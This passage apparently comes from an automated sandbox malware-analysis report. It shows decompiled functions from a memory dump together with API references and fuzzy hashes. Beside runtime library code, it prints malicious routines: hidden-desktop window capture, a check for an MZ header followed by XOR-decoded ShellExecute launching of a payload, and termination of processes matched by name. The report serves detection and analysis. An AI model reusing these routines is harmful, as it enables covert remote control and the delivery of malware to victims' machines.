					_push(__ebx);
					_t141 = _t146;
					_t59 = E00B4CCD0(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(_t59 == 0) {
						L38:
						 *((intOrPtr*)(E00B55BBD())) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(_t59 == _t146) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0xb6a510 - _t110; // 0x66b9f0
							if(__eflags != 0) {
								L14:
								_t64 =  *0xb6a510; // 0x66b9f0
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E00B5ADEB(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E00B5DE67(_t120, _t139, 4);
													E00B564B8(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E00B564B8( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E00B5DE67(_t139, _t138, 4);
												E00B564B8(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0xb6a510 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E00B598AF(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E00B564B8(_t149);
													goto L40;
												} else {
													_t76 = E00B56383(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E00B52919();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E00B598AF(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E00B55E69(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E00B564B8(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E00B598AF(_t53, 1);
																		E00B564B8(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E00B56383( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E00B52919();
																				asm("int3");
																				_t84 =  *0xb6a510; // 0x66b9f0
																				__eflags = _t84 -  *0xb6a51c; // 0x66b9f0
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0xb6a510 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														_t97 = E00B63695(_v20 + 1 + _t149 - _a4, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														__eflags = _t97;
														if(_t97 == 0) {
															_t98 = E00B55BBD();
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0xb6a510 = E00B598AF(1, 4);
										E00B564B8(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0xb6a510 - _t110; // 0x66b9f0
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0xb6a514 - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0xb6a514 = E00B598AF(1, 4);
												E00B564B8(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0xb6a514 - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E00B564B8(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0xb6a514 - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										_t108 = L00B5369A();
										__eflags = _t108;
										if(_t108 == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E00B55BBD();
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

APIs

___from_strstr_to_strchr.LIBCMT ref: 00B5AB09
_free.LIBCMT ref: 00B5ABE2
_free.LIBCMT ref: 00B5AC0F

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 4a6fc56e415628aacce7a6e60375ce602e84bd153bcb461db7d47af2033c80cf
Instruction ID: 438e1aa90e054fcc1ec18ef4f15051fe66a879b23fe359227429f6854b3db3a6
Opcode Fuzzy Hash: 4a6fc56e415628aacce7a6e60375ce602e84bd153bcb461db7d47af2033c80cf
Instruction Fuzzy Hash: 4151B671904205AFDF21AF64DC91B6D7BF4EF01316F1443EAEE11B72C1EA758A488B92

Uniqueness

Uniqueness Score: -1.00%

Function 00B442A8, Relevance: 12.1, APIs: 8, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00B442A8(void* __ebx, struct HWND__* __ecx, struct HDC__* __edx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4) {
				signed int _v4;
				struct tagRECT _v20;
				void* _v24;
				intOrPtr _v44;
				signed int _v48;
				int _v52;
				int _v56;
				struct HDC__* _v60;
				signed int _t17;
				void* _t28;
				struct HWND__* _t45;
				struct HDC__* _t47;
				void* _t48;
				struct HDC__* _t50;

				_t51 =  &_v24;
				_t17 =  *0xb69014; // 0x7e8b4fb6
				_v4 = _t17 ^  &_v24;
				_v24 = _a4;
				_t45 = __ecx;
				_t47 = __edx;
				GetWindowRect(__ecx,  &_v20);
				_t50 = CreateCompatibleDC(_t47);
				_t48 = CreateCompatibleBitmap(_t47, _v20.top - _v24, _v20.right - _v20.left);
				_t28 = SelectObject(_t50, _t48);
				__imp__PrintWindow(_t45, _t50, 0);
				if(_t28 != 0) {
					BitBlt(_v60, _v56, _v52, _v48 - _v56, _v44 - _v52, _t50, 0, 0, 0xcc0020);
				}
				DeleteObject(_t48);
				DeleteDC(_t50);
				return E00B4AE43(_v48 ^ _t51);
			}

0x00b442a8
0x00b442ab
0x00b442b2
0x00b442be
0x00b442c2
0x00b442c8
0x00b442ce
0x00b442db
0x00b442f6
0x00b442fa
0x00b44303
0x00b4430b
0x00b44333
0x00b44339
0x00b4433b
0x00b44342
0x00b4435c

APIs

GetWindowRect.USER32 ref: 00B442CE
CreateCompatibleDC.GDI32 ref: 00B442D5
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00B442F0
SelectObject.GDI32(00000000,00000000), ref: 00B442FA
PrintWindow.USER32(?,00000000,00000000,?,?,?,?,?,?,?,?,00B443B5,?), ref: 00B44303
BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 00B44333
DeleteObject.GDI32(00000000), ref: 00B4433B
DeleteDC.GDI32(00000000), ref: 00B44342

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CompatibleCreateDeleteObjectWindow$BitmapPrintRectSelect
String ID:
API String ID: 2993826089-0
Opcode ID: 0bca91cf8dc8a63e4ad6c1b83384bb5780dac5bf9bd0198d53fd64b8e18cf4c7
Instruction ID: c12e46b05e6a06514c8d6ccb915c0d5f6ba62856fba6076a017a772be475e387
Opcode Fuzzy Hash: 0bca91cf8dc8a63e4ad6c1b83384bb5780dac5bf9bd0198d53fd64b8e18cf4c7
Instruction Fuzzy Hash: BD110A72158205AF9341EF68DD88D6FBBECFB89258F40095DF585D3250CF68D9058BB2

Uniqueness

Uniqueness Score: -1.00%

Function 00B4CAC0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00B4CAC0(void* __ebx, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr* _v40;
				char _t58;
				signed int _t65;
				intOrPtr _t66;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr _t82;
				intOrPtr _t84;
				signed int _t88;
				char _t90;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr _t99;
				void* _t106;
				intOrPtr _t109;
				intOrPtr* _t111;
				intOrPtr _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				void* _t121;
				void* _t122;
				void* _t130;

				_t82 = _a8;
				_v5 = 0;
				_t114 = _t82 + 0x10;
				_push(_t114);
				_v16 = 1;
				_v20 = _t114;
				_v12 =  *(_t82 + 8) ^  *0xb69014;
				E00B4CA80( *(_t82 + 8) ^  *0xb69014);
				E00B4F487(_a12);
				_t58 = _a4;
				_t122 = _t121 + 0xc;
				_t109 =  *((intOrPtr*)(_t82 + 0xc));
				if(( *(_t58 + 4) & 0x00000066) != 0) {
					__eflags = _t109 - 0xfffffffe;
					if(_t109 != 0xfffffffe) {
						E00B4F470(_t82, 0xfffffffe, _t114, 0xb69014);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t58;
					_v28 = _a12;
					 *((intOrPtr*)(_t82 - 4)) =  &_v32;
					if(_t109 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t88 = _v12;
							_t20 = _t109 + 2; // 0x3
							_t65 = _t109 + _t20 * 2;
							_t84 =  *((intOrPtr*)(_t88 + _t65 * 4));
							_t66 = _t88 + _t65 * 4;
							_t89 =  *((intOrPtr*)(_t66 + 4));
							_v24 = _t66;
							if( *((intOrPtr*)(_t66 + 4)) == 0) {
								_t90 = _v5;
								goto L8;
							} else {
								_t67 = E00B4F420(_t89, _t114);
								_t90 = 1;
								_v5 = 1;
								_t130 = _t67;
								if(_t130 < 0) {
									_v16 = 0;
									L14:
									_push(_t114);
									E00B4CA80(_v12);
									goto L15;
								} else {
									if(_t130 > 0) {
										_t68 = _a4;
										__eflags =  *_t68 - 0xe06d7363;
										if( *_t68 == 0xe06d7363) {
											__eflags =  *0xb34370;
											if(__eflags != 0) {
												_t78 = E00B64D30(__eflags, 0xb34370);
												_t122 = _t122 + 4;
												__eflags = _t78;
												if(_t78 != 0) {
													_t118 =  *0xb34370; // 0xb4e178
													 *0xb672b4(_a4, 1);
													 *_t118();
													_t114 = _v20;
													_t122 = _t122 + 8;
												}
												_t68 = _a4;
											}
										}
										E00B4F454(_t68, _a8, _t68);
										_t70 = _a8;
										__eflags =  *((intOrPtr*)(_t70 + 0xc)) - _t109;
										if( *((intOrPtr*)(_t70 + 0xc)) != _t109) {
											E00B4F470(_t70, _t109, _t114, 0xb69014);
											_t70 = _a8;
										}
										_push(_t114);
										 *((intOrPtr*)(_t70 + 0xc)) = _t84;
										E00B4CA80(_v12);
										E00B4F438();
										asm("int3");
										_push(_t109);
										_t111 = _v40;
										__eflags =  *((char*)(_t111 + 4));
										if( *((char*)(_t111 + 4)) == 0) {
											L31:
											_t94 = _a4;
											_t72 =  *_t111;
											 *_t94 = _t72;
											 *((char*)(_t94 + 4)) = 0;
										} else {
											_t95 =  *_t111;
											__eflags = _t95;
											if(_t95 == 0) {
												goto L31;
											} else {
												_t106 = _t95 + 1;
												do {
													_t73 =  *_t95;
													_t95 = _t95 + 1;
													__eflags = _t73;
												} while (_t73 != 0);
												_push(_t84);
												_push(_t114);
												_t85 = _t95 - _t106 + 1;
												_push(_t95 - _t106 + 1);
												_t116 = E00B509A2();
												__eflags = _t116;
												if(_t116 != 0) {
													E00B56383(_t116, _t85,  *_t111);
													_t76 = _a4;
													_t99 = _t116;
													_t116 = 0;
													__eflags = 0;
													 *_t76 = _t99;
													 *((char*)(_t76 + 4)) = 1;
												}
												_t72 = E00B50985(_t116);
											}
										}
										return _t72;
									} else {
										goto L8;
									}
								}
							}
							goto L33;
							L8:
							_t109 = _t84;
						} while (_t84 != 0xfffffffe);
						if(_t90 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L33:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 00B4CAEB
___except_validate_context_record.LIBVCRUNTIME ref: 00B4CAF3
_ValidateLocalCookies.LIBCMT ref: 00B4CB81
__IsNonwritableInCurrentImage.LIBCMT ref: 00B4CBAC
_ValidateLocalCookies.LIBCMT ref: 00B4CC01

Strings

csm, xrefs: 00B4CB96

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: bf822cc15369b8dd0931a291cbef86222044b84ae5eca852f554f8b6644dde8f
Instruction ID: e348d12dbf0859ffc891c2815bd541491ebf208a787c15dabb0d6b7ffa7ac6ee
Opcode Fuzzy Hash: bf822cc15369b8dd0931a291cbef86222044b84ae5eca852f554f8b6644dde8f
Instruction Fuzzy Hash: 9D41A134A0120DABCF10DF68C885AAEBFF4EF45728F1481E5E8155B392DB359B01DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B45A71, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93
processthreadCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00B45A71(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v10;
				short _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v100;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v156;
				CHAR* _v160;
				struct _PROCESS_INFORMATION* _v176;
				struct HINSTANCE__* _v180;
				struct tagOFNA _v188;
				signed int _t28;
				CHAR* _t31;
				struct HINSTANCE__* _t34;
				CHAR* _t51;
				struct tagOFNA _t56;
				long _t58;
				CHAR* _t61;
				signed int _t63;
				signed int _t65;
				signed int _t66;

				_t65 = (_t63 & 0xfffffff8) - 0xbc;
				_t28 =  *0xb69014; // 0x7e8b4fb6
				_v8 = _t28 ^ _t65;
				SetThreadDesktop( *0xb6ae3c);
				_push(0x105);
				_t31 = E00B509A2();
				_t56 = 0x58;
				_t61 = _t31;
				E00B4D0F0(_t56,  &_v188, 0, _t56);
				_t66 = _t65 + 0x10;
				_v188 = _t56;
				_t34 = GetModuleHandleA(0);
				asm("movaps xmm0, [0xb3de40]");
				_t51 = 0;
				_v180 = _t34;
				asm("movups [esp+0xb0], xmm0");
				_v12 = 0x50;
				do {
					_t6 = _t51 + 0x40; // 0x40
					 *(_t66 + _t51 + 0xb0) =  *(_t66 + _t51 + 0xb0) ^ _t6;
					_t51 = _t51 + 1;
				} while (_t51 < 0x11);
				asm("movaps xmm0, [0xb3de10]");
				_v176 =  &_v28;
				_v160 = _t61;
				_v156 = 0x104;
				asm("movups [esp+0xb0], xmm0");
				_v12 = 0x3f25;
				_v10 = 0;
				_v140 = E00B427A4( &_v28);
				_v136 = 0x1000;
				if(GetOpenFileNameA( &_v188) != 0) {
					_t58 = 0x44;
					E00B4D0F0(_t58,  &_v100, 0, _t58);
					_v100.cb = _t58;
					_v100.lpDesktop = 0xb699c0;
					asm("stosd");
					_t66 = _t66 + 0xc;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					CreateProcessA(_t61, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v28);
				}
				return E00B4AE43(_v8 ^ _t66);
			}

APIs

SetThreadDesktop.USER32 ref: 00B45A94
GetModuleHandleA.KERNEL32(00000000), ref: 00B45ABF
GetOpenFileNameA.COMDLG32(?), ref: 00B45B48
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B45B92

Strings

Tett, xrefs: 00B45B6E
%?, xrefs: 00B45B21

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDesktopFileHandleModuleNameOpenProcessThread
String ID: %?$Tett
API String ID: 633583800-3620498704
Opcode ID: 5e55183e8bae8a10db9b1aadf87528156944cf214102cbff47ecbe28663384f1
Instruction ID: 7e8d98812590f1cb531091cc388b8539e726b34cd9be216709fd4f7a3f44e849
Opcode Fuzzy Hash: 5e55183e8bae8a10db9b1aadf87528156944cf214102cbff47ecbe28663384f1
Instruction Fuzzy Hash: 54315C725087849BE320DF68D845B9BBBE9FF98304F000A2EE69487161EB709548CB53

Uniqueness

Uniqueness Score: -1.00%

Function 00B48CE5, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 89
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00B48CE5(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v12;
				short _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				void* __ebp;
				signed int _t23;
				char* _t26;
				char* _t30;
				char* _t33;
				signed int _t56;
				void* _t59;

				_t43 = __ecx;
				_t23 =  *0xb69014; // 0x7e8b4fb6
				_v8 = _t23 ^ _t56;
				_t55 = __edx;
				_t59 = __ecx;
				if(_t59 == 0) {
					_t26 = E00B489B2(__ebx, __edx, __edi, __edx, _t56, __edx,  &_v32);
					if(_v32 > 0x400 &&  *_t26 == 0x4d &&  *((char*)(_t26 + 1)) == 0x5a) {
						_v24 = 0x271e7b03;
						_v20 = 0x3f236b28;
						_v16 = 0x2d;
						E00B48B64(E00B42D10( &_v24), _t26, _v32);
						_v24 = 0x271e7b03;
						_v20 = 0x3f236b28;
						_v16 = 0x2d;
						_v32 = 0x2d27312f;
						_v28 = 0;
						_t30 = E00B42D10( &_v24);
						_t21 =  &_v32; // 0x2d27312f
						ShellExecuteA(0, E00B432BE(_t21), _t30, 0, 0, 0);
					}
				} else {
					if(_t59 > 0) {
						if(__ecx <= 2) {
							_t33 = StrChrA(__edx, 0x3a);
							if(_t33 != 0) {
								 *_t33 = 0;
								E00B46268(_t55, E00B525D7(_t43,  &(_t33[1]), 0, 0xa));
							}
						} else {
							if(__ecx == 4) {
								_v24 = 0x6160007;
								_v20 = 0x1403081b;
								_v16 = 0xe0d081b;
								_v12 = 0;
								MessageBoxA(0, _t55, E00B42810( &_v24), 0);
							}
						}
					}
				}
				return E00B4AE43(_v8 ^ _t56);
			}

APIs

MessageBoxA.USER32 ref: 00B48D37
StrChrA.SHLWAPI(?,0000003A), ref: 00B48D45
ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B48DEC

Strings

/1'-, xrefs: 00B48D90
-, xrefs: 00B48DCC
(k#?, xrefs: 00B48DC5

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteMessageShell
String ID: (k#?$-$/1'-
API String ID: 649218774-1865253682
Opcode ID: 93bc8dec763b59b55c6ac34b0c1bf8eec4c925c1c6c6088244969185b62c0d60
Instruction ID: 1998e1c425329f2861ae63c692fefbb3e2e4c8fae4b65d813b61af8edacb3e0c
Opcode Fuzzy Hash: 93bc8dec763b59b55c6ac34b0c1bf8eec4c925c1c6c6088244969185b62c0d60
Instruction Fuzzy Hash: 00316FB0D02219AAEB15AFA48895ABF7BECEF11304F1044ADE51277181DE784F05AB66

Uniqueness

Uniqueness Score: -1.00%

Function 00B5D89C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5D89C(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xb6a8e8 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xb36b48 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00B563DD(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00B563DD(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

Strings

api-ms-, xrefs: 00B5D8F3
ext-ms-, xrefs: 00B5D907

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 53bf7508d7b07ad1f9dcb9ed2ab1349a8b5af6a17fdc49fdd59d2b52f2b1547a
Instruction ID: 5fa89c65d2bd546e49a28d7b2dc4abedb38f27a5a8a363e2ed214f93a274e2e1
Opcode Fuzzy Hash: 53bf7508d7b07ad1f9dcb9ed2ab1349a8b5af6a17fdc49fdd59d2b52f2b1547a
Instruction Fuzzy Hash: 6A21D531A45225ABDB319A249C84B6A77D8EF467B2F2403E1EC05B72D1DA70ED0886E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B49907, Relevance: 10.6, APIs: 7, Instructions: 67
processCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00B49907(void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				signed int _v16;
				char _v280;
				long _v308;
				void* _v312;
				void* _v316;
				signed int _t11;
				int _t15;
				signed int _t16;
				int _t17;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t28;
				void* _t30;
				void* _t34;
				signed int _t35;

				_t37 = (_t35 & 0xfffffff8) - 0x130;
				_t11 =  *0xb69014; // 0x7e8b4fb6
				_v8 = _t11 ^ (_t35 & 0xfffffff8) - 0x00000130;
				_t30 = CreateToolhelp32Snapshot(0xf, 0);
				_v312 = 0x128;
				_t15 = Process32First(_t30,  &_v312);
				L12:
				while(_t15 != 0) {
					_t24 = _a4;
					_t16 =  &_v280;
					while(1) {
						_t27 =  *_t16;
						if(_t27 !=  *_t24) {
							break;
						}
						if(_t27 == 0) {
							L6:
							_t17 = 0;
							L8:
							if(_t17 == 0) {
								_t34 = OpenProcess(1, _t17, _v308);
								if(_t34 != 0) {
									TerminateProcess(_t34, 9);
									CloseHandle(_t34);
								}
							}
							_t15 = Process32Next(_t30,  &_v316);
							goto L12;
						}
						_t28 =  *((intOrPtr*)(_t16 + 1));
						_t7 = _t24 + 1; // 0xded00528
						if(_t28 !=  *_t7) {
							break;
						}
						_t16 = _t16 + 2;
						_t24 = _t24 + 2;
						if(_t28 != 0) {
							continue;
						}
						goto L6;
					}
					asm("sbb eax, eax");
					_t17 = _t16 | 0x00000001;
					goto L8;
				}
				CloseHandle(_t30);
				return E00B4AE43(_v16 ^ _t37);
			}

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00B49927
Process32First.KERNEL32(00000000,00000128), ref: 00B4993D
OpenProcess.KERNEL32(00000001,?,?), ref: 00B4997C
TerminateProcess.KERNEL32(00000000,00000009), ref: 00B4998B
CloseHandle.KERNEL32(00000000), ref: 00B49992
Process32Next.KERNEL32 ref: 00B4999E
CloseHandle.KERNEL32(00000000), ref: 00B499A9

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
